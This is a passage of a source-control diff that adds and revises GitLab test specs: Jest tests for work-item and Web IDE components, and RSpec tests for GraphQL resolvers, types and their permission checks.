it('hides the alert on dismissing the error', async () => { + createComponent({ data: { error: true } }); + expect(findAlert().exists()).toBe(true); + + findAlert().vm.$emit('dismiss'); + await nextTick(); + expect(findAlert().exists()).toBe(false); + }); + + describe('when title input field has a text', () => { + beforeEach(async () => { + const mockTitle = 'Test title'; + createComponent(); + await findTitleInput().vm.$emit('title-input', mockTitle); + }); + + it('renders a non-disabled Create button', () => { + expect(findCreateButton().props('disabled')).toBe(false); + }); + + it('redirects to the work item page on successful mutation', async () => { + wrapper.find('form').trigger('submit'); + await waitForPromises(); + + expect(wrapper.vm.$router.push).toHaveBeenCalled(); + }); + + // TODO: write a proper test here when we 
have a backend implementation + it.todo('shows an alert on mutation error'); + }); +}); diff --git a/spec/frontend/work_items/pages/work_item_root_spec.js b/spec/frontend/work_items/pages/work_item_root_spec.js index 64d02baed36..02795751f33 100644 --- a/spec/frontend/work_items/pages/work_item_root_spec.js +++ b/spec/frontend/work_items/pages/work_item_root_spec.js @@ -1,12 +1,16 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import Vue from 'vue'; +import { shallowMount } from '@vue/test-utils'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; import workItemQuery from '~/work_items/graphql/work_item.query.graphql'; +import updateWorkItemMutation from '~/work_items/graphql/update_work_item.mutation.graphql'; import WorkItemsRoot from '~/work_items/pages/work_item_root.vue'; +import ItemTitle from '~/work_items/components/item_title.vue'; +import { resolvers } from '~/work_items/graphql/resolvers'; import { workItemQueryResponse } from '../mock_data'; -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); const WORK_ITEM_ID = '1'; @@ -14,10 +18,10 @@ describe('Work items root component', () => { let wrapper; let fakeApollo; - const findTitle = () => wrapper.find('[data-testid="title"]'); + const findTitle = () => wrapper.findComponent(ItemTitle); const createComponent = ({ queryResponse = workItemQueryResponse } = {}) => { - fakeApollo = createMockApollo(); + fakeApollo = createMockApollo([], resolvers); fakeApollo.clients.defaultClient.cache.writeQuery({ query: workItemQuery, variables: { @@ -30,7 +34,6 @@ describe('Work items root component', () => { propsData: { id: WORK_ITEM_ID, }, - localVue, apolloProvider: fakeApollo, }); }; @@ -44,7 +47,28 @@ describe('Work items root component', () => { createComponent(); expect(findTitle().exists()).toBe(true); - expect(findTitle().text()).toBe('Test'); + 
expect(findTitle().props('initialTitle')).toBe('Test'); + }); + + it('updates the title when it is edited', async () => { + createComponent(); + jest.spyOn(wrapper.vm.$apollo, 'mutate'); + const mockUpdatedTitle = 'Updated title'; + + await findTitle().vm.$emit('title-changed', mockUpdatedTitle); + + expect(wrapper.vm.$apollo.mutate).toHaveBeenCalledWith({ + mutation: updateWorkItemMutation, + variables: { + input: { + id: WORK_ITEM_ID, + title: mockUpdatedTitle, + }, + }, + }); + + await waitForPromises(); + expect(findTitle().props('initialTitle')).toBe(mockUpdatedTitle); }); it('does not render the title if title is not in the widgets list', () => { diff --git a/spec/frontend/work_items/router_spec.js b/spec/frontend/work_items/router_spec.js index 0a57eab753f..6017c9d9dbb 100644 --- a/spec/frontend/work_items/router_spec.js +++ b/spec/frontend/work_items/router_spec.js @@ -1,5 +1,6 @@ import { mount } from '@vue/test-utils'; import App from '~/work_items/components/app.vue'; +import CreateWorkItem from '~/work_items/pages/create_work_item.vue'; import WorkItemsRoot from '~/work_items/pages/work_item_root.vue'; import { createRouter } from '~/work_items/router'; @@ -27,4 +28,10 @@ describe('Work items router', () => { expect(wrapper.find(WorkItemsRoot).exists()).toBe(true); }); + + it('renders create work item page on `/new` route', async () => { + await createComponent('/new'); + + expect(wrapper.findComponent(CreateWorkItem).exists()).toBe(true); + }); }); diff --git a/spec/frontend_integration/ide/helpers/ide_helper.js b/spec/frontend_integration/ide/helpers/ide_helper.js index 56b2e298aa3..54a522324f5 100644 --- a/spec/frontend_integration/ide/helpers/ide_helper.js +++ b/spec/frontend_integration/ide/helpers/ide_helper.js @@ -192,6 +192,13 @@ export const commit = async ({ newBranch = false, newMR = false, newBranchName = switchLeftSidebarTab('Commit'); screen.getByTestId('begin-commit-button').click(); + await waitForMonacoEditor(); + + const mrCheck = 
await screen.findByLabelText('Start a new merge request'); + if (Boolean(mrCheck.checked) !== newMR) { + mrCheck.click(); + } + if (!newBranch) { const option = await screen.findByLabelText(/Commit to .+ branch/); option.click(); @@ -201,12 +208,9 @@ export const commit = async ({ newBranch = false, newMR = false, newBranchName = const branchNameInput = await screen.findByTestId('ide-new-branch-name'); fireEvent.input(branchNameInput, { target: { value: newBranchName } }); - - const mrCheck = await screen.findByLabelText('Start a new merge request'); - if (Boolean(mrCheck.checked) !== newMR) { - mrCheck.click(); - } } screen.getByText('Commit').click(); + + await waitForMonacoEditor(); }; diff --git a/spec/frontend_integration/ide/helpers/start.js b/spec/frontend_integration/ide/helpers/start.js index 4451c1ee946..3c5ed9dfe20 100644 --- a/spec/frontend_integration/ide/helpers/start.js +++ b/spec/frontend_integration/ide/helpers/start.js @@ -4,16 +4,18 @@ import setWindowLocation from 'helpers/set_window_location_helper'; import { TEST_HOST } from 'helpers/test_constants'; import { initIde } from '~/ide'; import extendStore from '~/ide/stores/extend'; +import { getProject, getEmptyProject } from 'jest/../frontend_integration/test_helpers/fixtures'; import { IDE_DATASET } from './mock_data'; export default (container, { isRepoEmpty = false, path = '', mrId = '' } = {}) => { const projectName = isRepoEmpty ? 'lorem-ipsum-empty' : 'lorem-ipsum'; const pathSuffix = mrId ? `merge_requests/${mrId}` : `tree/master/-/${path}`; + const project = isRepoEmpty ? 
getEmptyProject() : getProject(); setWindowLocation(`${TEST_HOST}/-/ide/project/gitlab-test/${projectName}/${pathSuffix}`); const el = document.createElement('div'); - Object.assign(el.dataset, IDE_DATASET); + Object.assign(el.dataset, IDE_DATASET, { project: JSON.stringify(project) }); container.appendChild(el); const vm = initIde(el, { extendStore }); diff --git a/spec/frontend_integration/ide/user_opens_ide_spec.js b/spec/frontend_integration/ide/user_opens_ide_spec.js index f56cd008d1c..c9d78d1de8f 100644 --- a/spec/frontend_integration/ide/user_opens_ide_spec.js +++ b/spec/frontend_integration/ide/user_opens_ide_spec.js @@ -34,10 +34,10 @@ describe('IDE: User opens IDE', () => { expect(await screen.findByText('No files')).toBeDefined(); }); - it('shows a "New file" button', async () => { - const button = await screen.findByTitle('New file'); + it('shows a "New file" button', () => { + const buttons = screen.queryAllByTitle('New file'); - expect(button.tagName).toEqual('BUTTON'); + expect(buttons.map((x) => x.tagName)).toContain('BUTTON'); }); }); diff --git a/spec/frontend_integration/test_helpers/setup/index.js b/spec/frontend_integration/test_helpers/setup/index.js index 946ccbec00c..0c16592f2e2 100644 --- a/spec/frontend_integration/test_helpers/setup/index.js +++ b/spec/frontend_integration/test_helpers/setup/index.js @@ -1,4 +1,4 @@ -import '../../../frontend/test_setup'; +import 'helpers/shared_test_setup'; import './setup_globals'; import './setup_axios'; import './setup_serializers'; diff --git a/spec/frontend_integration/test_helpers/setup/setup_globals.js b/spec/frontend_integration/test_helpers/setup/setup_globals.js index b63a9a96372..ac5aeb1dd72 100644 --- a/spec/frontend_integration/test_helpers/setup/setup_globals.js +++ b/spec/frontend_integration/test_helpers/setup/setup_globals.js @@ -1,15 +1,10 @@ -import { setTestTimeout } from 'helpers/timeout'; +import { initializeTestTimeout } from 'helpers/timeout'; + 
+initializeTestTimeout(process.env.CI ? 20000 : 7000); beforeEach(() => { window.gon = { api_version: 'v4', relative_url_root: '', }; - - setTestTimeout(7000); - jest.useRealTimers(); -}); - -afterEach(() => { - jest.useFakeTimers(); }); diff --git a/spec/graphql/mutations/merge_requests/accept_spec.rb b/spec/graphql/mutations/merge_requests/accept_spec.rb index db75c64a447..c97c78ec206 100644 --- a/spec/graphql/mutations/merge_requests/accept_spec.rb +++ b/spec/graphql/mutations/merge_requests/accept_spec.rb @@ -5,14 +5,14 @@ require 'spec_helper' RSpec.describe Mutations::MergeRequests::Accept do include AfterNextHelpers - let_it_be(:user) { create(:user) } - let(:project) { create(:project, :public, :repository) } - subject(:mutation) { described_class.new(context: context, object: nil, field: nil) } - let_it_be(:context) do + let_it_be(:user) { create(:user) } + + let(:project) { create(:project, :public, :repository) } + let(:context) do GraphQL::Query::Context.new( - query: OpenStruct.new(schema: GitlabSchema), + query: double('query', schema: GitlabSchema), values: { current_user: user }, object: nil ) diff --git a/spec/graphql/mutations/merge_requests/create_spec.rb b/spec/graphql/mutations/merge_requests/create_spec.rb index ba0ac3cbe66..83af1e3f1b3 100644 --- a/spec/graphql/mutations/merge_requests/create_spec.rb +++ b/spec/graphql/mutations/merge_requests/create_spec.rb @@ -7,9 +7,10 @@ RSpec.describe Mutations::MergeRequests::Create do let_it_be(:project) { create(:project, :public, :repository) } let_it_be(:user) { create(:user) } - let_it_be(:context) do + + let(:context) do GraphQL::Query::Context.new( - query: OpenStruct.new(schema: nil), + query: double('query', schema: nil), values: { current_user: user }, object: nil ) diff --git a/spec/graphql/mutations/user_callouts/create_spec.rb b/spec/graphql/mutations/user_callouts/create_spec.rb index 93f227d8b82..eac39bdd1b0 100644 --- a/spec/graphql/mutations/user_callouts/create_spec.rb +++ 
b/spec/graphql/mutations/user_callouts/create_spec.rb @@ -13,7 +13,7 @@ RSpec.describe Mutations::UserCallouts::Create do let(:feature_name) { 'not_supported' } it 'does not create a user callout' do - expect { resolve }.not_to change(UserCallout, :count).from(0) + expect { resolve }.not_to change(Users::Callout, :count).from(0) end it 'returns error about feature name not being supported' do @@ -22,10 +22,10 @@ RSpec.describe Mutations::UserCallouts::Create do end context 'when feature name is supported' do - let(:feature_name) { UserCallout.feature_names.each_key.first.to_s } + let(:feature_name) { Users::Callout.feature_names.each_key.first.to_s } it 'creates a user callout' do - expect { resolve }.to change(UserCallout, :count).from(0).to(1) + expect { resolve }.to change(Users::Callout, :count).from(0).to(1) end it 'sets dismissed_at for the user callout' do diff --git a/spec/graphql/resolvers/board_list_issues_resolver_spec.rb b/spec/graphql/resolvers/board_list_issues_resolver_spec.rb index 53d2c8a853c..6907c55bd48 100644 --- a/spec/graphql/resolvers/board_list_issues_resolver_spec.rb +++ b/spec/graphql/resolvers/board_list_issues_resolver_spec.rb @@ -25,7 +25,7 @@ RSpec.describe Resolvers::BoardListIssuesResolver do let(:wildcard_started) { 'STARTED' } let(:filters) { { milestone_title: ["started"], milestone_wildcard_id: wildcard_started } } - it 'raises a mutually exclusive filter error when milstone wildcard and title are provided' do + it 'raises a mutually exclusive filter error when milestone wildcard and title are provided' do expect do resolve_board_list_issues(args: { filters: filters }) end.to raise_error(Gitlab::Graphql::Errors::ArgumentError) @@ -80,6 +80,16 @@ RSpec.describe Resolvers::BoardListIssuesResolver do expect(result).to match_array([]) end + + context 'when filtering by confidential' do + let(:confidential_issue) { create(:issue, project: project, labels: [label], relative_position: nil, confidential: true) } + + it 'returns matching 
issue' do + result = resolve_board_list_issues(args: { filters: { confidential: true } }) + + expect(result).to contain_exactly(confidential_issue) + end + end end end diff --git a/spec/graphql/resolvers/ci/runner_status_resolver_spec.rb b/spec/graphql/resolvers/ci/runner_status_resolver_spec.rb new file mode 100644 index 00000000000..fbef07b72e6 --- /dev/null +++ b/spec/graphql/resolvers/ci/runner_status_resolver_spec.rb @@ -0,0 +1,40 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Resolvers::Ci::RunnerStatusResolver do + include GraphqlHelpers + + describe '#resolve' do + let(:user) { build(:user) } + let(:runner) { build(:ci_runner) } + + subject(:resolve_subject) { resolve(described_class, ctx: { current_user: user }, obj: runner, args: args) } + + context 'with legacy_mode' do + context 'set to 14.5' do + let(:args) do + { legacy_mode: '14.5' } + end + + it 'calls runner.status with specified legacy_mode' do + expect(runner).to receive(:status).with('14.5').once.and_return(:online) + + expect(resolve_subject).to eq(:online) + end + end + + context 'set to nil' do + let(:args) do + { legacy_mode: nil } + end + + it 'calls runner.status with specified legacy_mode' do + expect(runner).to receive(:status).with(nil).once.and_return(:stale) + + expect(resolve_subject).to eq(:stale) + end + end + end + end +end diff --git a/spec/graphql/resolvers/ci/runners_resolver_spec.rb b/spec/graphql/resolvers/ci/runners_resolver_spec.rb index bb8dadeca40..df6490df915 100644 --- a/spec/graphql/resolvers/ci/runners_resolver_spec.rb +++ b/spec/graphql/resolvers/ci/runners_resolver_spec.rb @@ -45,6 +45,7 @@ RSpec.describe Resolvers::Ci::RunnersResolver do let(:finder) { instance_double(::Ci::RunnersFinder) } let(:args) do { + active: true, status: 'active', type: :instance_type, tag_list: ['active_runner'], @@ -55,6 +56,7 @@ RSpec.describe Resolvers::Ci::RunnersResolver do let(:expected_params) do { + active: true, status_status: 'active', type_type: 
:instance_type, tag_name: ['active_runner'], diff --git a/spec/graphql/resolvers/clusters/agent_activity_events_resolver_spec.rb b/spec/graphql/resolvers/clusters/agent_activity_events_resolver_spec.rb new file mode 100644 index 00000000000..5a6b27e43a5 --- /dev/null +++ b/spec/graphql/resolvers/clusters/agent_activity_events_resolver_spec.rb @@ -0,0 +1,34 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Resolvers::Clusters::AgentActivityEventsResolver do + include GraphqlHelpers + + it { expect(described_class.type).to eq(Types::Clusters::AgentActivityEventType) } + it { expect(described_class.null).to be_truthy } + + describe '#resolve' do + let_it_be(:agent) { create(:cluster_agent) } + + let(:user) { create(:user, maintainer_projects: [agent.project]) } + let(:ctx) { { current_user: user } } + let(:events) { double } + + before do + allow(agent).to receive(:activity_events).and_return(events) + end + + subject { resolve(described_class, obj: agent, ctx: ctx) } + + it 'returns events associated with the agent' do + expect(subject).to eq(events) + end + + context 'user does not have permission' do + let(:user) { create(:user, developer_projects: [agent.project]) } + + it { is_expected.to be_empty } + end + end +end diff --git a/spec/graphql/resolvers/container_repository_tags_resolver_spec.rb b/spec/graphql/resolvers/container_repository_tags_resolver_spec.rb new file mode 100644 index 00000000000..4e7ea253c87 --- /dev/null +++ b/spec/graphql/resolvers/container_repository_tags_resolver_spec.rb @@ -0,0 +1,54 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Resolvers::ContainerRepositoryTagsResolver do + include GraphqlHelpers + + let_it_be(:user) { create(:user) } + let_it_be(:project) { create(:project, :public) } + let_it_be_with_reload(:repository) { create(:container_repository, project: project) } + + let(:args) { { sort: nil } } + + describe '#resolve' do + let(:resolver) { resolve(described_class, 
ctx: { current_user: user }, obj: repository, args: args) } + + before do + stub_container_registry_config(enabled: true) + end + + context 'by name' do + subject { resolver.map(&:name) } + + before do + stub_container_registry_tags(repository: repository.path, tags: %w(aaa bab bbb ccc 123), with_manifest: false) + end + + context 'without sort' do + # order is not guaranteed + it { is_expected.to contain_exactly('aaa', 'bab', 'bbb', 'ccc', '123') } + end + + context 'with sorting and filtering' do + context "name_asc" do + let(:args) { { sort: :name_asc } } + + it { is_expected.to eq(%w(123 aaa bab bbb ccc)) } + end + + context "name_desc" do + let(:args) { { sort: :name_desc } } + + it { is_expected.to eq(%w(ccc bbb bab aaa 123)) } + end + + context 'filter by name' do + let(:args) { { sort: :name_desc, name: 'b' } } + + it { is_expected.to eq(%w(bbb bab)) } + end + end + end + end +end diff --git a/spec/graphql/resolvers/package_pipelines_resolver_spec.rb b/spec/graphql/resolvers/package_pipelines_resolver_spec.rb new file mode 100644 index 00000000000..d48d4d8ae01 --- /dev/null +++ b/spec/graphql/resolvers/package_pipelines_resolver_spec.rb @@ -0,0 +1,84 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Resolvers::PackagePipelinesResolver do + include GraphqlHelpers + + let_it_be_with_reload(:package) { create(:package) } + let_it_be(:pipelines) { create_list(:ci_pipeline, 3, project: package.project) } + + let(:user) { package.project.owner } + let(:args) { {} } + + describe '#resolve' do + subject { resolve(described_class, obj: package, args: args, ctx: { current_user: user }) } + + before do + package.pipelines = pipelines + package.save! 
+ end + + it { is_expected.to contain_exactly(*pipelines) } + + context 'with invalid after' do + let(:args) { { first: 1, after: 'not_json_string' } } + + it 'raises argument error' do + expect { subject }.to raise_error(Gitlab::Graphql::Errors::ArgumentError) + end + end + + context 'with invalid after key' do + let(:args) { { first: 1, after: encode_cursor(foo: 3) } } + + it 'raises argument error' do + expect { subject }.to raise_error(Gitlab::Graphql::Errors::ArgumentError) + end + end + + context 'with invalid before' do + let(:args) { { last: 1, before: 'not_json_string' } } + + it 'raises argument error' do + expect { subject }.to raise_error(Gitlab::Graphql::Errors::ArgumentError) + end + end + + context 'with invalid before key' do + let(:args) { { last: 1, before: encode_cursor(foo: 3) } } + + it 'raises argument error' do + expect { subject }.to raise_error(Gitlab::Graphql::Errors::ArgumentError) + end + end + + context 'field options' do + let(:field) do + field_options = described_class.field_options.merge( + owner: resolver_parent, + name: 'dummy_field' + ) + ::Types::BaseField.new(**field_options) + end + + it 'sets them properly' do + expect(field).not_to be_connection + expect(field.extras).to match_array([:lookahead]) + end + end + + context 'with unauthorized user' do + let_it_be(:user) { create(:user) } + + it { is_expected.to be_nil } + end + + def encode_cursor(json) + GitlabSchema.cursor_encoder.encode( + Gitlab::Json.dump(json), + nonce: true + ) + end + end +end diff --git a/spec/graphql/resolvers/users/participants_resolver_spec.rb b/spec/graphql/resolvers/users/participants_resolver_spec.rb new file mode 100644 index 00000000000..3f04d157410 --- /dev/null +++ b/spec/graphql/resolvers/users/participants_resolver_spec.rb @@ -0,0 +1,83 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Resolvers::Users::ParticipantsResolver do + include GraphqlHelpers + + describe '#resolve' do + let_it_be(:user) { create(:user) } 
+ let_it_be(:guest) { create(:user) } + let_it_be(:project) { create(:project, :public) } + let_it_be(:issue) { create(:issue, project: project) } + let_it_be(:note) do + create( + :note, + :system, + :confidential, + project: project, + noteable: issue, + author: create(:user) + ) + end + + let_it_be(:note_metadata) { create(:system_note_metadata, note: note) } + + subject(:resolved_items) { resolve(described_class, args: {}, ctx: { current_user: current_user }, obj: issue)&.items } + + before do + project.add_guest(guest) + project.add_developer(user) + end + + context 'when current user is not set' do + let(:current_user) { nil } + + it 'returns only publicly visible participants for this user' do + is_expected.to match_array([issue.author]) + end + end + + context 'when current user does not have enough permissions' do + let(:current_user) { guest } + + it 'returns only publicly visible participants for this user' do + is_expected.to match_array([issue.author]) + end + end + + context 'when current user has access to confidential notes' do + let(:current_user) { user } + + it 'returns all participants for this user' do + is_expected.to match_array([issue.author, note.author]) + end + + context 'N+1 queries' do + let(:query) { -> { resolve(described_class, args: {}, ctx: { current_user: current_user }, obj: issue)&.items } } + + before do + # warm-up + query.call + end + + it 'does not execute N+1 for project relation' do + control_count = ActiveRecord::QueryRecorder.new { query.call } + + create(:note, :confidential, project: project, noteable: issue, author: create(:user)) + + expect { query.call }.not_to exceed_query_limit(control_count) + end + + it 'does not execute N+1 for system note metadata relation' do + control_count = ActiveRecord::QueryRecorder.new { query.call } + + new_note = create(:note, :system, project: project, noteable: issue, author: create(:user)) + create(:system_note_metadata, note: new_note) + + expect { query.call }.not_to 
exceed_query_limit(control_count) + end + end + end + end +end diff --git a/spec/graphql/types/admin/analytics/usage_trends/measurement_type_spec.rb b/spec/graphql/types/admin/analytics/usage_trends/measurement_type_spec.rb index d1c2b4044c1..37c9d6b269c 100644 --- a/spec/graphql/types/admin/analytics/usage_trends/measurement_type_spec.rb +++ b/spec/graphql/types/admin/analytics/usage_trends/measurement_type_spec.rb @@ -36,8 +36,14 @@ RSpec.describe GitlabSchema.types['UsageTrendsMeasurement'] do end context 'when the user is not admin' do - it 'returns no data' do - expect(subject.dig('data', 'usageTrendsMeasurements')).to be_nil + it 'returns an error' do + expected_err = "The resource that you are attempting to access does not exist or you don't have permission to perform this action" + + expect(subject["errors"].first["message"]).to eq(expected_err) + end + + it 'does not return usageTrendsMeasurements data' do + expect(subject["data"]["usageTrendsMeasurements"]).to be_nil end end @@ -48,7 +54,7 @@ RSpec.describe GitlabSchema.types['UsageTrendsMeasurement'] do stub_application_setting(admin_mode: false) end - it 'returns data' do + it 'returns usageTrendsMeasurements data' do expect(subject.dig('data', 'usageTrendsMeasurements', 'nodes')).not_to be_empty end end diff --git a/spec/graphql/types/base_edge_spec.rb b/spec/graphql/types/base_edge_spec.rb new file mode 100644 index 00000000000..3afb4202173 --- /dev/null +++ b/spec/graphql/types/base_edge_spec.rb @@ -0,0 +1,76 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Types::BaseEdge do + include GraphqlHelpers + + let_it_be(:test_schema) do + project_edge_type = Class.new(described_class) do + field :proof_of_admin_rights, String, + null: true, authorize: :admin_project + + def proof_of_admin_rights + 'ok' + end + end + + project_type = Class.new(::Types::BaseObject) do + graphql_name 'Project' + authorize :read_project + edge_type_class project_edge_type + + field :name, String, 
null: false + end + + Class.new(GraphQL::Schema) do + lazy_resolve ::Gitlab::Graphql::Lazy, :force + use ::GraphQL::Pagination::Connections + use ::Gitlab::Graphql::Pagination::Connections + + query(Class.new(::Types::BaseObject) do + graphql_name 'Query' + field :projects, project_type.connection_type, null: false + + def projects + context[:projects] + end + end) + end + end + + def document + GraphQL.parse(<<~GQL) + query { + projects { + edges { + proofOfAdminRights + node { name } + } + } + } + GQL + end + + it 'supports field authorization on edge fields' do + user = create(:user) + private_project = create(:project, :private) + member_project = create(:project, :private) + maintainer_project = create(:project, :private) + public_project = create(:project, :public) + + member_project.add_developer(user) + maintainer_project.add_maintainer(user) + projects = [private_project, member_project, maintainer_project, public_project] + + data = { current_user: user, projects: projects } + query = GraphQL::Query.new(test_schema, document: document, context: data) + result = query.result.to_h + + expect(graphql_dig_at(result, 'data', 'projects', 'edges', 'node', 'name')) + .to contain_exactly(member_project.name, maintainer_project.name, public_project.name) + + expect(graphql_dig_at(result, 'data', 'projects', 'edges', 'proofOfAdminRights')) + .to contain_exactly(nil, 'ok', nil) + end +end diff --git a/spec/graphql/types/boards/board_issue_input_type_spec.rb b/spec/graphql/types/boards/board_issue_input_type_spec.rb index 5d3efb9b40d..ed2872c3598 100644 --- a/spec/graphql/types/boards/board_issue_input_type_spec.rb +++ b/spec/graphql/types/boards/board_issue_input_type_spec.rb @@ -7,7 +7,7 @@ RSpec.describe GitlabSchema.types['BoardIssueInput'] do it 'has specific fields' do allowed_args = %w(labelName milestoneTitle assigneeUsername authorUsername - releaseTag myReactionEmoji not search assigneeWildcardId) + releaseTag myReactionEmoji not search assigneeWildcardId 
confidential) expect(described_class.arguments.keys).to include(*allowed_args) expect(described_class.arguments['not'].type).to eq(Types::Boards::NegatedBoardIssueInputType) diff --git a/spec/graphql/types/ci/job_need_union_spec.rb b/spec/graphql/types/ci/job_need_union_spec.rb new file mode 100644 index 00000000000..49df9ddc7eb --- /dev/null +++ b/spec/graphql/types/ci/job_need_union_spec.rb @@ -0,0 +1,43 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Types::Ci::JobNeedUnion do + describe '.resolve_type' do + context 'when resolving a build need' do + it 'resolves to a BuildNeedType' do + resolved_type = described_class.resolve_type(build(:ci_build_need), {}) + + expect(resolved_type).to be(Types::Ci::BuildNeedType) + end + end + + context 'when resolving a build' do + it 'resolves to a JobType' do + resolved_type = described_class.resolve_type(build(:ci_build), {}) + + expect(resolved_type).to be(Types::Ci::JobType) + end + end + + context 'when resolving an unrelated object' do + it 'raises a TypeNotSupportedError for string object' do + expect do + described_class.resolve_type(+'unrelated object', {}) + end.to raise_error(Types::Ci::JobNeedUnion::TypeNotSupportedError) + end + + it 'raises a TypeNotSupportedError for nil object' do + expect do + described_class.resolve_type(nil, {}) + end.to raise_error(Types::Ci::JobNeedUnion::TypeNotSupportedError) + end + + it 'raises a TypeNotSupportedError for other CI object' do + expect do + described_class.resolve_type(build(:ci_pipeline), {}) + end.to raise_error(Types::Ci::JobNeedUnion::TypeNotSupportedError) + end + end + end +end diff --git a/spec/graphql/types/ci/job_token_scope_type_spec.rb b/spec/graphql/types/ci/job_token_scope_type_spec.rb index 19a8cc324f9..43225b2089b 100644 --- a/spec/graphql/types/ci/job_token_scope_type_spec.rb +++ b/spec/graphql/types/ci/job_token_scope_type_spec.rb @@ -12,7 +12,7 @@ RSpec.describe GitlabSchema.types['CiJobTokenScopeType'] do end describe 
'query' do - let_it_be(:project) { create(:project, ci_job_token_scope_enabled: true).tap(&:save!) } + let(:project) { create(:project, ci_job_token_scope_enabled: true).tap(&:save!) } let_it_be(:current_user) { create(:user) } let(:query) do @@ -65,8 +65,12 @@ RSpec.describe GitlabSchema.types['CiJobTokenScopeType'] do project.ci_cd_settings.update!(job_token_scope_enabled: false) end + it 'does not return an error' do + expect(subject['errors']).to be_nil + end + it 'returns nil' do - expect(subject.dig('data', 'project', 'ciJobTokenScope')).to be_nil + expect(subject['data']['project']['ciJobTokenScope']).to be_nil end end end diff --git a/spec/graphql/types/ci/job_type_spec.rb b/spec/graphql/types/ci/job_type_spec.rb index e95a7da4fe5..e3cb56c2ad5 100644 --- a/spec/graphql/types/ci/job_type_spec.rb +++ b/spec/graphql/types/ci/job_type_spec.rb @@ -25,6 +25,7 @@ RSpec.describe Types::Ci::JobType do needs pipeline playable + previousStageJobsOrNeeds queued_at queued_duration refName diff --git a/spec/graphql/types/clusters/agent_activity_event_type_spec.rb b/spec/graphql/types/clusters/agent_activity_event_type_spec.rb new file mode 100644 index 00000000000..7773bad749d --- /dev/null +++ b/spec/graphql/types/clusters/agent_activity_event_type_spec.rb @@ -0,0 +1,11 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe GitlabSchema.types['ClusterAgentActivityEvent'] do + let(:fields) { %i[recorded_at kind level user agent_token] } + + it { expect(described_class.graphql_name).to eq('ClusterAgentActivityEvent') } + it { expect(described_class).to require_graphql_authorizations(:admin_cluster) } + it { expect(described_class).to have_graphql_fields(fields) } +end diff --git a/spec/graphql/types/clusters/agent_type_spec.rb b/spec/graphql/types/clusters/agent_type_spec.rb index 4b4b601b230..a1e5952bf73 100644 --- a/spec/graphql/types/clusters/agent_type_spec.rb +++ b/spec/graphql/types/clusters/agent_type_spec.rb @@ -3,7 +3,7 @@ require 
'spec_helper' RSpec.describe GitlabSchema.types['ClusterAgent'] do - let(:fields) { %i[created_at created_by_user id name project updated_at tokens web_path connections] } + let(:fields) { %i[created_at created_by_user id name project updated_at tokens web_path connections activity_events] } it { expect(described_class.graphql_name).to eq('ClusterAgent') } diff --git a/spec/graphql/types/container_respository_tags_sort_enum_spec.rb b/spec/graphql/types/container_respository_tags_sort_enum_spec.rb new file mode 100644 index 00000000000..b464037d8d9 --- /dev/null +++ b/spec/graphql/types/container_respository_tags_sort_enum_spec.rb @@ -0,0 +1,13 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe GitlabSchema.types['ContainerRepositoryTagSort'] do + specify { expect(described_class.graphql_name).to eq('ContainerRepositoryTagSort') } + + it 'exposes all the existing issue sort values' do + expect(described_class.values.keys).to include( + *%w[NAME_ASC NAME_DESC] + ) + end +end diff --git a/spec/graphql/types/issue_type_enum_spec.rb b/spec/graphql/types/issue_type_enum_spec.rb index 7ae5eb76f28..131e92aa5ed 100644 --- a/spec/graphql/types/issue_type_enum_spec.rb +++ b/spec/graphql/types/issue_type_enum_spec.rb @@ -5,9 +5,9 @@ require 'spec_helper' RSpec.describe Types::IssueTypeEnum do specify { expect(described_class.graphql_name).to eq('IssueType') } - it 'exposes all the existing issue type values' do - expect(described_class.values.keys).to include( - *%w[ISSUE INCIDENT] + it 'exposes all the existing issue type values except for task' do + expect(described_class.values.keys).to match_array( + %w[ISSUE INCIDENT TEST_CASE REQUIREMENT] ) end end diff --git a/spec/graphql/types/issue_type_spec.rb b/spec/graphql/types/issue_type_spec.rb index c0a0fdf3b0b..1b8bf007a73 100644 --- a/spec/graphql/types/issue_type_spec.rb +++ b/spec/graphql/types/issue_type_spec.rb @@ -66,10 +66,16 @@ RSpec.describe GitlabSchema.types['Issue'] do end context 'when 
user does not have the permission' do - it 'returns no data' do + before do allow(Ability).to receive(:allowed?).with(user, :read_project, project).and_return(false) + end - expect(subject.dig(:data, :project)).to eq(nil) + it 'does not return an error' do + expect(subject['errors']).to be_nil + end + + it 'returns no data' do + expect(subject['data']['project']).to be_nil end end diff --git a/spec/graphql/types/packages/package_details_type_spec.rb b/spec/graphql/types/packages/package_details_type_spec.rb index 7e1103d8aa0..f0b684d6b07 100644 --- a/spec/graphql/types/packages/package_details_type_spec.rb +++ b/spec/graphql/types/packages/package_details_type_spec.rb @@ -10,4 +10,13 @@ RSpec.describe GitlabSchema.types['PackageDetailsType'] do expect(described_class).to include_graphql_fields(*expected_fields) end + + it 'overrides the pipelines field' do + field = described_class.fields['pipelines'] + + expect(field).to have_graphql_type(Types::Ci::PipelineType.connection_type) + expect(field).to have_graphql_extension(Gitlab::Graphql::Extensions::ExternallyPaginatedArrayExtension) + expect(field).to have_graphql_resolver(Resolvers::PackagePipelinesResolver) + expect(field).not_to be_connection + end end diff --git a/spec/graphql/types/project_type_spec.rb b/spec/graphql/types/project_type_spec.rb index 4f205e861dd..adf5507571b 100644 --- a/spec/graphql/types/project_type_spec.rb +++ b/spec/graphql/types/project_type_spec.rb @@ -34,7 +34,7 @@ RSpec.describe GitlabSchema.types['Project'] do container_repositories container_repositories_count pipeline_analytics squash_read_only sast_ci_configuration cluster_agent cluster_agents agent_configurations - ci_template timelogs merge_commit_template + ci_template timelogs merge_commit_template squash_commit_template ] expect(described_class).to include_graphql_fields(*expected_fields) diff --git a/spec/graphql/types/range_input_type_spec.rb b/spec/graphql/types/range_input_type_spec.rb index ca27527c2b5..fc9126247fa 
